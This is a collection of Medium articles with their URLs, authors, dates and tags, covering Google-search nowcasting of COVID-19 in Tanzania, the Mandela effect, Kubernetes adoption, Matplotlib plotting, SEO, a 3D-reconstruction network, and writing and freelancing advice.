31, 2020. One quirk of the Google Ads system is you can’t serve ads to people who have their web browsers set to the KiSwahili language. Roughly 12.15 Tanzanians speak KiSwahili for every one person who speaks English. Meanwhile, Google has data on just 5.1% of the country’s devices. So the actual number of anosmia searches being conducted in Tanzania is actually closer to ~1,824 per day. Google is withholding (at least) 94.9% of the data for these campaigns, so I multiply daily searches by 19.61 to get a rough projection of the searches I should be receiving. To put this in perspective, between May 8 and May 31 there were 3,275 anosmia searches from NYC and 18,143 reported cases. The search to case ratio was 1:5.5. In Chicago, there was a search to case ratio of 1:4 during that same time period. In D.C.: 1:1.96. In most of the U.S. cities I targeted, I saw that cases were 1.75–6X anosmia searches. Roughly 1,824 anosmia searches were being conducted from Tanzania every day since May 8. This is not an apples to apples comparison, because I am not counting more ambiguous anosmia-related searches, such as “loss of smell,” in the U.S., and there’s also no way to know for certain how much data Google has on individuals vs. devices in a given region. 
Nevertheless, I estimate the number of actual Covid-19 cases happening in Tanzania every day in May was in the low four figures. It could be lower. But there can’t be zero cases. “Nowcasting” is the tracking of the spread of illness using Google searches. It’s a technique that works, as Bill Lampos’ model shows. It’s a technique that’s also failed. Google Flu Trends, the first and best-known nowcasting tool, stopped working after three years. It failed to predict the peak of the 2013 flu season. “However, the most helpful conclusion to draw is not that search data analysis is unreliable,” Sam Gilbert writes. “But that it’s a complement to other methods and not a replacement for them.” One model I’m keeping an eye on is run by the MRC Centre for Global Infectious Disease Analysis at Imperial College London. The model estimates the true number of infections in Tanzania during the four weeks between April 29 and May 26, 2020 to be 24,869. Google searches can be a flare to signal observers outside of the black box. Even if it turns out that anosmia-related searches fail to predict Covid-19 infection, I don’t think we should allow the sentiment that took hold after the failure of Google Flu Trends to take hold again. This isn’t the time to be bearish on nowcasting. Because people are turning to Google more than ever to tell it things they tell no one else. And more than ever we need the best option we have available to cut through obfuscation and understand the censored by intercepting their thoughts, fears, hopes (or symptoms). If a government wants to lock down their data — prevent the real story from being learned by their citizens, or the rest of the world — they will have to ban Google outright. Not because their citizens might use Google to research unbiased information, but because Google searches can be a flare to signal observers outside of the black box. “Advertising ceases to be advertising when it answers a question.” This is a motto that colleagues of mine, who resented the fact that they were marketers, but who used Google Ads for commercial applications (to sell people products and services they didn’t need), would tell themselves so they could feel better about their work. When you ask Google a question about reviews on a new sneaker, or about what phase of lockdown you’re currently in, or about a strange symptom you’re suddenly experiencing, the first result on your search results page is an ad, technically. It’s also an answer. It’s also many other things.
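Before moving on, here is a quick numeric recap of the projection arithmetic used in the Tanzania section above (my own illustration, not the author’s code): roughly 93 observed searches per day, a 5.1% device-coverage estimate, and the resulting ~1,824 projected daily searches, alongside the NYC search-to-case ratio used for comparison.

```python
# Figures quoted in the article (approximate)
observed_daily_searches = 93    # English-language anosmia searches seen per day
google_device_coverage = 0.051  # Google is estimated to see ~5.1% of devices

# Scale the observed searches up to the whole population of devices
projection_factor = 1 / google_device_coverage            # ~19.61
projected_daily_searches = observed_daily_searches * projection_factor
print(f"Projected daily anosmia searches: {projected_daily_searches:.0f}")  # ~1824

# U.S. comparison: NYC between May 8 and May 31
nyc_cases_per_search = 18143 / 3275
print(f"NYC cases per anosmia search: {nyc_cases_per_search:.1f}")  # ~5.5
```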
https://onezero.medium.com/google-searches-reveal-covid-19-hot-spots-before-governments-do-b689b3008ac1
['Patrick Berlinquette']
2020-07-14 12:22:09.229000+00:00
['Covid 19', 'Coronavirus', 'Google', 'Public Health', 'Data']
Which Image Is Right?. Are we in an alternate reality or does…
Possible Explanations for Mandela Effects Alternate Realities One theory about the basis for the Mandela effect originates from quantum physics and relates to the idea that rather than one timeline of events, it is possible that alternate realities or universes are taking place and mixing with our timeline. In theory, this would result in groups of people having the same memories because the timeline has been altered as we shift between these different realities. False Memories Before we consider what is meant by false memories, let’s look at an example of the Mandela effect as it will help us to understand how memory can be faulty (and may lead to the phenomenon that we are describing). Who was Alexander Hamilton? Most Americans learned in school that he was a founding father of the United States of America but that he was not a president. However, when asked about the presidents of the United States, many people mistakenly believe that Hamilton was a president. Why? If we consider a simple neuroscience explanation, the memory for Alexander Hamilton is encoded in an area of the brain where the memories for the presidents of the United States are stored. The means by which memory traces are stored is called the engram and the framework in which similar memories are associated with each other is called the schema. So when people try to recall Hamilton, this sets off the neurons in close connection to each other, bringing with it the memory of the presidents. (Though this is an oversimplified explanation, it illustrates the general process.) When memories are recalled, rather than remembered perfectly, they are influenced to the point that they can eventually become incorrect. In this way, memory is unreliable and not infallible. Memory-Related Concepts This leads to the likelihood that problems with memory, and not alternate universes, are the explanation for the Mandela effect. In fact, there are a number of subtopics related to memory that may play a role in this phenomenon. Here are a few possibilities to consider:
https://medium.com/random-awesome/which-image-is-right-d67e758ca471
['Toni Tails']
2020-12-11 15:37:17.437000+00:00
['Humor', 'History', 'Marketing', 'Psychology', 'Art']
The Best Software Engineering Books I Read in 2020
The Best Software Engineering Books I Read in 2020 A software engineer’s reading list Photo by Thought Catalog on Unsplash. As 2020 draws to a close, I am thrilled to share with you a selection of the best software engineering books that I have read during the past 12 months. If you are a software engineer, data scientist, or one of those people who work in the tech or software industry, you will agree with me that you have to constantly keep learning if you are to remain relevant in the game. When you decide to become a software engineer, you essentially sign up for a journey of lifelong learning. There are many ways of learning or acquiring knowledge, but books still remain a dominant force in that sphere.
https://medium.com/better-programming/the-best-software-engineering-books-i-read-in-2020-8bf9dee61111
['Mwiza Kumwenda']
2020-12-28 16:36:35.924000+00:00
['Programming', 'Software Development', 'JavaScript', 'Books', 'Software Engineering']
Feeling Good About Writing is a Good Enough Reason to Keep Going
Writing isn’t like eating croissants. It isn’t like pancakes or waffles or whatever your decadent pleasure. There’s no need to feel guilty about enjoying writing for the sake of writing. You don’t need to make a lot of money from your writing to be worthy of writing. Earlier this year, my family and I visited Paris, and I ate more croissants than I could count. It made me want to run a 5K every day. This is a natural reaction — extreme or not — to an overindulgence issue. But when I overindulge in writing (if that even exists), there’s no such feeling unless outside circumstances have pushed me to feel this way. Meaning, I’ve allowed either someone or something to tell me that writing for enjoyment isn’t enough. That I should push for more based on not my own values, but someone else’s. In marketing, there’s a term called KPI, which means key performance indicators. As a good marketer, you define your KPIs and measure them based on your goals for implementing your marketing strategy. As a writer, you define your personal KPIs based on your goals. Many writers who enjoy writing end up quitting altogether because they haven’t properly defined their goals. Or they’ve become attached to goals that don’t align with what they truly value.
https://medium.com/2-minute-madness/feeling-good-about-writing-is-a-good-enough-reason-to-keep-going-c67448fd82b
['Brandon B. Keith']
2020-11-13 18:43:51.740000+00:00
['Writing Tips', 'Writing', 'Self', 'Art', 'Creativity']
The Best of Better Programming (10/31–11/13/2020)
Jobs from Better Programming Jobs Our job board is launching very soon for your company to hire through us, but this week we have two exciting opportunities from the Better Programming staff! * First, Tony Stubblebine, Better Programming's co-founder and publisher, is looking for a Ruby or Rails engineer: "I'm looking for a programmer to work on a side project with me to help put self-published books on to Medium. Will pay normal $ + split profit on the tool." More details about the project can be found here: https://coachtony.medium.com/epub-to-medium-daf8ae8431f1 --- * Second, Better Programming is looking for a substitute Editor-in-Chief for late January-March: My wife and I are expecting our first child at the end of January, so I'm looking for someone with a technical background and some editorial experience to fill in for me while I take paternity leave. If interested, email me @ [email protected] with your engineering and editorial qualifications. This is a paid opportunity. --- Jobs are free to post and $100 to promote to our email list of 75,000+ job seekers. Want to post your company's job with Better Programming Jobs? Just fill out our Typeform here.
https://medium.com/better-programming/the-best-of-better-programing-10-31-11-13-2020-51b70d16dac
['Zack Shapiro']
2020-11-13 18:36:55.323000+00:00
['Startup', 'JavaScript', 'Software Development', 'Python', 'Programming']
Atlas — Neural Network Reconstructing a 3D Scene From Image 📸
Limitations of past models Traditional approaches to the 3D reconstruction task rely on the intermediate representation of depth maps before predicting the full 3D model of the scene. The researchers hypothesized that direct 2D-to-3D prediction without an intermediate step would yield more accurate results. How the proposed approach works The input of the model is a set of 2D images of the scene. A 2D CNN extracts features from each input image separately. These features are projected and accumulated into a voxel volume. After this 3D accumulation, a 3D CNN refines the accumulated features and predicts the truncated signed distance function (TSDF) values. In addition, semantic segmentation of the reconstructed 3D model is carried out without significant additional computation.
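To make the shape of the pipeline concrete, here is a minimal PyTorch sketch of the idea (my own illustration, not the authors' code). The layer sizes are arbitrary, and the camera back-projection step — which in Atlas places each image feature along its viewing ray — is replaced by a crude pooling-and-broadcast stand-in so the example stays short and runnable.

```python
import torch
import torch.nn as nn

class AtlasSketch(nn.Module):
    """Illustrative sketch: 2D features -> voxel accumulation -> 3D refinement -> TSDF."""
    def __init__(self, feat_dim=32, grid=(32, 32, 32)):
        super().__init__()
        self.backbone2d = nn.Sequential(              # per-view 2D feature extractor
            nn.Conv2d(3, feat_dim, 3, stride=2, padding=1), nn.ReLU(),
            nn.Conv2d(feat_dim, feat_dim, 3, stride=2, padding=1), nn.ReLU(),
        )
        self.refine3d = nn.Sequential(                # 3D CNN refinement + TSDF head
            nn.Conv3d(feat_dim, feat_dim, 3, padding=1), nn.ReLU(),
            nn.Conv3d(feat_dim, 1, 1),
        )
        self.grid = grid

    def forward(self, images):
        # images: (batch, n_views, 3, H, W)
        b, n, c, h, w = images.shape
        feats = self.backbone2d(images.view(b * n, c, h, w))
        feats = feats.view(b, n, feats.shape[1], *feats.shape[2:])
        # Stand-in for camera back-projection: pool each view's features and
        # broadcast them into a voxel grid, then average across views.
        pooled = feats.mean(dim=(3, 4))                                  # (b, n, feat_dim)
        vox = pooled.mean(dim=1)[:, :, None, None, None].expand(b, -1, *self.grid)
        return self.refine3d(vox.contiguous())                           # (b, 1, D, H, W)

model = AtlasSketch()
views = torch.randn(1, 3, 3, 64, 64)   # 1 scene, 3 RGB views of 64x64
print(model(views).shape)               # torch.Size([1, 1, 32, 32, 32])
```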
https://medium.com/deep-learning-digest/atlas-neural-network-reconstructing-a-3d-scene-from-image-d8422c135d81
['Mikhail Raevskiy']
2020-09-01 13:21:13.189000+00:00
['Deep Learning', 'Machine Learning', 'Data Science', 'Artificial Intelligence', 'AI']
There are Only Two Jobs You Can Do From Your Bed
Here are some writers and authors who did great work and even preferred writing in bed: 1. Marcel Proust Shanghai Noir Marcel Proust writing in bed “It is pleasant, when one is distraught, to lie in the warmth of one’s bed, and there, with all effort and struggle at an end, even perhaps with one’s head under the blankets, surrender completely to howling, like branches in the autumn wind.” 2. Truman Capote “I am a completely horizontal author,” said the author of In Cold Blood and Breakfast at Tiffany’s, “I can’t think unless I’m lying down, either in bed or stretched on a couch and with a cigarette and coffee handy.” Truman Capote writing in bed Copyright getty image 3. William Wordsworth The Romantic poet apparently preferred writing his poems in bed in complete darkness, starting over whenever he lost a sheet of paper because looking for it was too much effort. 4. Mark Twain “Just try it in bed some time,” the author told the New York Times in 1902. “I sit up with a pipe in my mouth and a board on my knees, and I scribble away. Thinking is easy work, and there isn’t much labor in moving your fingers sufficiently to get the words down.” 5. James Joyce The Irish author wrote lying down on his stomach — which doesn’t seem like the most comfortable position. 6. George Orwell The dying George Orwell used to prop his typewriter up in bed and hammer away at the final draft of 1984. The doctor who treated him in Glasgow said all he could remember was the sound of typing and the fog of cigarette smoke in Orwell’s bedroom.
https://medium.com/writing-heals/there-are-only-two-jobs-you-can-do-from-your-bed-9f1a5fd9bf38
['Michelle Monet']
2019-11-09 17:11:29.314000+00:00
['Writing Life', 'History', 'Writing', 'Creativity', 'Art']
People first: Aurélien Nicolas (Deckard AI)
“AI for Software Engineering Process Management” is another field of applying Artificial Intelligence to Software Engineering. This time we prepared an interview with Aurélien Nicolas, CTO at Deckard AI and an expert in this subject matter, who shares a bit about his technical background, personal motivation and professional vision.
https://medium.com/ai-for-software-engineering/people-first-aur%C3%A9lien-nicolas-deckard-ai-3a1768ff9d93
['Aiforse Community']
2017-10-27 07:07:35.514000+00:00
['Machine Learning', 'Project Management', 'Software Development', 'Artificial Intelligence', 'People']
Starting off with Visualization in Python — Matplotlib
First step as always is to import all the required libraries. import matplotlib.pyplot as plt import numpy as np from random import sample %matplotlib inline Lets generate some data for the plotting exercise and plot a simple line plot. x = np.linspace(0,10,20)#Generate 20 points between 0 and 10 y = x**2 # Create y as X squared plt.plot(x,y) # Plot the above data Figure 1 Plotting the above figure requires only a single line command. While it is simple, it does not mean we don’t have the option to customize it. plt.plot(x, y, color='green', linestyle='--', linewidth=2, alpha= 0.5) Figure 2 The parameters passed within the plot command control for: ‘color’ indicates the colour of the line and can be given even as a RGB hex code ‘linestyle’ is how you want the line to be, can be ‘ — — ’ or ‘-.’ for dash dotted line ‘linewidth’ takes an integer input for indicating the thickness of the line ‘alpha’ controls the transparency of the line Sometimes a line might not be enough, you might need to even indicate which are the exact data points, in such cases you can add markers plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 5) Fig 3 This plot has red coloured round markers. These markers can further be customized by modifying their boundaries. plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 10, markeredgewidth = 2, markeredgecolor = 'black') Fig 4 The markers are same as before, but now they have a black boundary. The parameters for controlling the markers are: ‘marker’ indicates what shape you want the marker to be, can be ‘o’ ,‘*’ or ‘+’ ‘markerfacecolor’ indicates the colour of the marker ‘markersize’ similar to linewidth controls the size of the marker ‘markeredgewidth’ and ‘markeredgecolor’ are used for specifying the boundary thickness and colour respectively. Lets combine all of the above together into one plot: Figure 5 Not the prettiest of plots, but you get the idea. While this covers the basics of plotting data, there is still a lot more to be done is terms of titles, range of axes, legends etc. The easiest way to do this is via the use of Matplotlib’s object oriented method. Object Oriented method Matplotlib has an object oriented API which allows you to create figure and axes objects. These objects can then be called in an orderly manner to perform functions such as plotting the data or customizing the figure. fig, ax = plt.subplots() Fig 6 The above command returns the figure and axis objects and creates an empty plot. This can then be used to recreate the above plot with the plot and axes titles and the legend. fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 7 The above plot(Fig 7) has the axes and plot titles, legend and different ranges for the X and Y axes. Plotting Multiple lines Suppose you want to compare two different sets of data, i.e, by plotting multiple lines in the same figure. In that case all you need to add is one more plot command. 
fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 8 Another way of comparing would be to show two different plots side by side. fig, ax = plt.subplots(1,2)#Create the objects ax[0].plot(x,y,label = 'X squared')#The data to be plotted and legend ax[1].plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax[0].set_title('Plot 1')#Plot title ax[1].set_title('Plot 2')#Plot title ax[0].legend()#Command to display the legend for plot 1 ax[1].legend()#Command to display the legend for plot 2 plt.tight_layout()#To ensure no overlap Fig 9 This is done by first passing in the number of plots in the ‘subplot()’ function. The (1,2) above means that there should be 1 row of plots and 2 columns of plots, in effective meaning 2 plots. The functions are repeated for each one of the plots and the ‘tight_layout()’ command ensures that there is no overlap. A small change here being the command to display the legends. The plot.legend() function displays the legend only for one plot, to display for both you need to specify it for each plot. The third way of comparison would be to use an inset plot. Within a larger plot, have a smaller plot. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared')# Main plot axins.plot(x,1/x,label='X inverse')# Inset plot ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot')#Main plot title axins.set_title('Inset Plot')# Inset plot title ax.legend()#Legend for main plot axins.legend()#Legend for inset plot Fig 10 The ‘figsize’ parameter within the ‘subplots()’ function allows to change the size of the figure. The ‘inset_axes’ function is used to create the inset plot while also specifying the location and size. The first two numbers specify the plot location in terms of percentage. In the above case, the first two numbers 0.1 and 0.6 specifies that the plot should be 10% to the left and 60% above the Y and X axes respectively. The last two numbers 0.4 and 0.3 specifies that the plot should be 40% and 30% of the main plot’s width and height. You might have noticed that the legend of the main plot is overlapping on the inset plot. While matplotlib automatically chooses the best possible location for the legend, it can be manually moved as well using the ‘loc’ parameter. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 11 The ‘loc’ parameter takes in input between 0 and 10 corresponding to a position within the plot. 0 means that Matplotlib will choose the best possible position and it is the default option with all other integers corresponding to a location within the plot. Here I passed ‘4’ to the ‘loc’ parameter meaning the legend is placed in the bottom right corner. 
The last customization I will be covering will be with changing the plot background. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.grid(True)#Show grid axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title axins.grid(color='blue', alpha=0.3, linestyle='--', linewidth=2)#Grid modifications ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 12 The main plot here has the default grid, which can be created by simply calling the grid() function. The grid lines too can be modified just like the plot lines. These modifications can be seen in the inset plot. The grid lines in it have a different colour, style and width compared to the ones in the main plot.
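Since the combined plot from Figure 5 (“combine all of the above together into one plot”) is only shown as an image above, here is a small sketch of what that combination might look like — the line colour, style, width, and transparency together with the customized markers. The exact values are guesses, not necessarily those used in the original figure.

```python
import numpy as np
import matplotlib.pyplot as plt

x = np.linspace(0, 10, 20)  # 20 points between 0 and 10
y = x ** 2                  # y as x squared

# Line customizations and marker customizations applied in a single plot call
plt.plot(
    x, y,
    color='green', linestyle='--', linewidth=2, alpha=0.5,
    marker='o', markerfacecolor='red', markersize=10,
    markeredgewidth=2, markeredgecolor='black',
)
plt.show()
```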
https://towardsdatascience.com/visualization-in-python-matplotlib-c5c2aa2620a
['Pranav Prathvikumar']
2019-10-24 20:03:31.178000+00:00
['Python', 'Data Science', 'Visualization', 'Data Visualization']
Blood and Barbed Wire
Initial meeting Despite the informality of working on the floor of my home office, I felt that I should kick off the meeting with some semi-professional expectation-setting; I let him know that my main goal was to put together visuals that would help him more effectively tell his story when seeing a new GI doctor. I also told him I was going to ask a lot of questions and he could opt out if he didn’t want to talk about something. (That seems important when crossing boundaries between friendship and informal counseling.) He’d shown up to my house with a 4-page, single spaced document in which he had written down the things he wanted to say — symptom descriptions, tests he’d had, diets and interventions he’d tried, family history, and more. The narrative contained a lot of useful information, but I could see that it could be difficult for a doctor to absorb in a short amount of time. Timeline sketch We started with a timeline of events. I had taped together four 11x17 pages and drawn a line to represent his whole life. Using his prepared narrative, we hunched over the timeline and noted key events; as we worked, he also remembered things that were not in his document. Some detail from the initial timeline Feeling good/bad Next I left the room and gave him some materials to put together a picture of what his body feels like when he’s feeling good and feeling bad. I’d prepared a sheet of icons that he could cut out and tape to the body shape, or he could simply draw on it. He took about 10 minutes to do this. When I came back, I was extremely impressed by what he had put together. I asked him to talk me through it, and as he did I wrote down quotes along the side of the image. Feeling bad: “Like barbed wire making its way through my intestines” Feeling good: At this point we had a timeline, drawings of what ‘feeling good’ and ‘feeling bad’ look like, and a list of questions and theories that had come up along the way. Key problem Aside from not getting any answers or solid reasoning for his symptoms, my friend’s biggest frustration was that new doctors kept wanting to have him try the same treatments, even though he was sure they were not helping. We decided to put together a matrix showing what ‘helps’ and ‘does not help’ along with any supporting evidence.
https://medium.com/pictal-health/blood-barbed-wire-cfef600bfdd4
['Katie Mccurdy']
2018-04-18 18:19:55.700000+00:00
['Health', 'Visualization', 'Data', 'Healthcare', 'UX']
Convergence to Kubernetes
We wanted to scale our teams further but maintain the principles of what helped us move fast: autonomy, work with minimal coordination, self-service infrastructure. Kubernetes helps us achieve this in a few ways: Application-focused abstractions We operate and configure our clusters to minimise coordination Application focused abstractions At the core of Kubernetes are concepts that map closely to the language used by an application developer. For example, you manage versions of your applications as a Deployment. You can run multiple replicas behind a Service and map that to HTTP via Ingress. And, through Custom Resources, it’s possible to extend and specialise this language to your own needs. These abstractions help application teams be more productive. The ones I’ve described above are pretty much all you need to deploy and run a web application, for example. Kubernetes automates the rest. In my iceberg picture I showed earlier these core concepts sit at the waterline: connecting what an application developer is trying to achieve with the platform underneath. Our cluster operations team can make many of the lower-level, lower-value decisions (like managing metrics, logging etc.) but have a conceptual language that connects them to the application teams above. In 2010 uSwitch operated a traditional operations team that was responsible for running the monolith and in relatively recent history had an IT team that was partly responsible for managing our AWS account. I believe one of the things that constrained the success of that team was the lack of conceptual sharing. When your language only includes concepts like EC2 instances, load-balancers, subnets, it’s hard to communicate much meaning. It made it difficult/impossible to describe what an application was; sometimes that was a Debian package, maybe it was something deployed with Capistrano etc. It wasn’t possible to describe an application in language shared by teams. In the early 2000s I worked at ThoughtWorks in London. During my interviews I was recommended Eric Evans’ Domain Driven Design book. I bought a copy from Foyles on my way home, started reading it on the train and have referenced it on most projects and systems I’ve worked on ever since. One of the key concepts presented in the book is Ubiquitous Language: emphasising the careful extraction of common vocabulary to aid communication amongst people and teams. I believe that one of Kubernetes’ greatest strengths is providing a ubiquitous language that connects applications teams and infrastructure teams. And, because it’s extensible, this can grow beyond the core concepts to more domain and business specific concepts. Shared language helps us communicate more effectively when we need to but we still want to ensure teams can operate with minimal coordination. 
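As a concrete illustration of that shared vocabulary (my own sketch, not uSwitch's configuration), the snippet below builds a minimal Deployment manifest as a plain Python dictionary and prints it as JSON, which kubectl apply -f also accepts. The application name, image, and port are placeholders; a Service and Ingress would be expressed in the same vocabulary.

```python
import json

def deployment(name: str, image: str, replicas: int = 2, port: int = 8080) -> dict:
    """Build a minimal Kubernetes Deployment manifest as a dict."""
    labels = {"app": name}
    return {
        "apiVersion": "apps/v1",
        "kind": "Deployment",
        "metadata": {"name": name, "labels": labels},
        "spec": {
            "replicas": replicas,
            "selector": {"matchLabels": labels},
            "template": {
                "metadata": {"labels": labels},
                "spec": {
                    "containers": [
                        {"name": name, "image": image, "ports": [{"containerPort": port}]}
                    ]
                },
            },
        },
    }

# Placeholder application; pipe the output to `kubectl apply -f -` to create it
print(json.dumps(deployment("example-web", "example.com/example-web:1.0.0"), indent=2))
```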
Minimise Necessary Coordination In the Accelerate book the authors highlight characteristics of loosely-coupled architecture that drives IT performance: the biggest contributor to continuous delivery in the 2017 analysis… is whether teams can: Make large-scale changes to the design of their system without the permission of somebody outside the team Make large-scale changes to the design of their system without depending on other teams to make changes in their systems or creating significant work for other teams Complete their work without communicating and coordinating with people outside their team Deploy and release their product or service on demand, regardless of other services it depends upon Do most of their testing on demand, without requiring an integrated test environment We wanted to run centralised, soft multi-tenant clusters that all teams could build upon but we wanted to retain many of the characteristics described above. It’s not possible to avoid entirely but we operate Kubernetes as follows to try and minimise it: We run multiple production clusters and teams are able to choose which clusters to run their application in. We don’t use Federation yet (we’re waiting on AWS support) but we use Envoy instead to load-balance across the different cluster Ingress load-balancers. We can automate much of this with our Continuous Delivery pipeline (we use Drone) and other AWS services. All clusters are configured with the same Namespaces. These map approximately 1:1 with teams. We use RBAC to control access to Namespaces. All access is authenticated and authorised against our corporate identity in Active Directory. Clusters are auto-scaled and we do as much as we can to optimise node start-up time. It’s still a couple of minutes but it means that, in general, no coordination is needed even when teams need to run large workloads. Applications auto-scale using application-level metrics exported from Prometheus. Application teams can export Queries per Second, Operations per Second etc. and manage the autoscaling of their application in response to that metric. And, because we use the Cluster autoscaler, nodes will be provisioned if demand exceeds our current cluster capacity. We wrote a Go command-line tool called u that standardises the way teams authenticate to Kubernetes, Vault, request temporary AWS credentials and more. Authenticating to Kubernetes using u command-line tool I’m not arguing that Kubernetes has increased our autonomy, although that may be the case, but it’s certainly helped us maintain high levels of self-service and autonomy while reducing some of the pain we felt.
https://pingles.medium.com/convergence-to-kubernetes-137ffa7ea2bc
['Paul Ingles']
2018-06-25 13:29:15.825000+00:00
['Lean', 'Agile', 'Kubernetes', 'DevOps', 'AWS']
How SEO Works In 2017
How SEO Works In 2017 The way SEO works has changed. Here’s what you need to know. The way SEO works has changed. Here’s what you need to know. Most purchasing decisions start with a Google search and as such, SEO should still be your #1 source of new traffic, new leads and new revenue. If it’s not, then this is what to do about it. If it is, then this is how to keep it that way. How SEO used to work When Google started it was one single internet search engine… You would log on to google.com and perform a search: And regardless of who or where you were, you would have seen the same list of businesses from all around the world. At the time, this was fine. Google was just getting started, the internet wasn’t very big and there wasn’t that many people using it. But it was growing. And it got bigger. Much bigger. In 1998, there were 2.4 million websites on the internet. Today, there are over 1.2 billion. And it’s growing by the second: As the volume of websites on the internet grows, so does the volume of people doing Google searches: With this much data to process, and this many users to serve, it no longer made sense for Google to show everyone around the world the same list of results. And that’s how we got localised search engines like: The idea being, to show all users search results that were geographically relevant to their individual location. As the growth continued, so did the localisation to the point that most people are familiar with today which is ‘city based’ search engines. Whether searching a keyword with a local intent like “mechanic” or “mechanic brisbane”, most people would expect to see business that are in their local city. This is the paradigm most businesses we speak to are familiar with and has been the primary model for decision making around SEO strategy for a long time. And for a long time, it worked well. But not anymore. Why?
https://medium.com/digitaldisambiguation/how-seo-works-in-2017-279fe1c64709
['Jason Mcmahon']
2017-12-21 01:12:48.771000+00:00
['SEO', 'Google', 'Advertising', 'Marketing', 'Digital Marketing']
Is Medium Worth It for Freelance Writers?
Is Medium Worth It for Freelance Writers? It depends on your goals and how much you’re willing to invest in the platform Image by Jason McBride Medium is one of the most exciting platforms for writers. It’s easy to publish your work. There are no gatekeepers or technical hurdles stopping you. It is also much easier to find an audience on Medium than it is on a traditional blog. Even better, if you want, you can get paid for your work directly from the platform. You don’t have to sell a course or affiliate products — you can get paid based on the amount of time people spend reading your words. However, if you are a professional writer, you have to guard your time carefully. Is it worth it to write on Medium? The answer depends on what you want to get out of the platform. I have been a freelance writer making a full-time income online for over eight years. I joined the Medium Partner Program in 2018. The most I have ever made in a month from the Partner Program is $1,070 in August of this year. Last month I made $533, and this month I will probably make another $500. I am not a high earner here. I have also taken long breaks from the platform because of health issues and my freelance business demands. However, I keep coming back to Medium for three reasons: It’s fun to write here Every article I write becomes a tiny digital asset Writing on Medium is great for my business Why Do You Want to Write Here? If you want to write on Medium because it’s an easy way to make money, you are wasting your time. Only 6% of writers make over $100 any given month. The highest-earning writers, the ones that earn six-figures a year just from the Partner Program, have spent years writing tons of articles. They have worked their asses off to build a loyal audience, and they have written a ton. I know writers who make significant money on Medium. You could be one of them if you want to, but it takes a lot of work. Other than looking for a shortcut to fame and fortune, there are no wrong reasons for writing on Medium. It can be an excellent way to earn some extra money. It can also be an excellent way to improve your writing skills and to meet other writers and editors. Before you decide if writing on Medium is worth it for you, you need to have a plan for how you will use the platform. Ways to Use Medium to Help Your Career Except for my first month, I have always earned at least $100 on Medium. Even when I went six months without publishing anything on the platform because I was dealing with kidney cancer, my articles were still earning a little bit of money every day. You can earn some passive income from Medium if you have a large enough backlist of curated articles. The more I publish, the more I make from the Partner Program. As much as I love getting paid directly from Medium, the reason I keep coming back here is that there are other ways to make money from writing here. I have made much more money from clients that have hired me after reading one of my posts on Medium than I ever have from the Partner Program. It’s not even close. If you are a freelance writer, Medium lets you get paid to build a portfolio. Clients can see that you have the knowledge and skills to help them. Through your writing, they get to know you before they even contact you. Another way Medium helps freelancers is that it allows you to build an email list. Building an email list will help you grow your writing business because you can take your audience with you, no matter where you go. Medium could disappear tomorrow. 
If you have an email list, you can direct your biggest fans to your next project. Some writers on Medium have leveraged their work here to get book deals and sell articles to magazine publishers. When you consistently put good work out into the world, people eventually take notice. Medium helps you get noticed faster. No matter what kind of writer you want to be, Medium can help you take the next step in your career if you are strategic. Changes in the Platform This doesn’t mean Medium is perfect. There is always a danger to publishing on a platform you don’t control. Medium is always changing. Sometimes the changes require you to shift the way you use the platform. Currently, Medium is changing the look of the platform and tweaking how stories are found. If you are interested in succeeding here, it doesn’t do any good to complain. You always have the same choices. You can quit, you can refuse to adapt and fade into obscurity, or you can evolve with the platform. I’ve been lucky here. Every change Medium has made since I joined in 2018 has made it easier for me to make money. However, the current changes require me to adapt. I still believe that Medium is good for me financially and creatively. But, I have changed how I use the platform. Future Strategy In the past, I have used my two main publications, Escape Motivation and Weirdo Poetry, to build two very different audiences. This has always been difficult, and with the new changes, it may be impossible for me. My new strategy is to create a new account to publish poetry, humor, comics, and visual essays in Weirdo Poetry while using this account to post stories about writing, freelancing, marketing, and business. I will still publish 99% of my work in Escape Motivation. I suspect it will take a long time for my new account to ever make $100. The kind of short creative work I write there is not easy to monetize on Medium. My main goal for the other account is to build an audience and experiment with different forms. My new account is about creative expression. I want to make it profitable, but creativity is the primary goal. The focus of this account will continue to be making money by helping freelancers, solopreneurs, and small businesses. That strategy has worked well for the past two years, and I don’t see any reason to change. I am going to be publishing more regularly on both accounts. If you are interested in my new account, you can find it here: You Get Out What You Put In Is Medium worth it for freelancers? Yes! If you are willing to invest time in building a library of useful content for your audience, it is worth the effort to write here. However, you will have to decide what your strategy will be. You have a lot of different options. But, while I believe you can do anything — you can’t do everything. You will only succeed if you commit to a strategy.
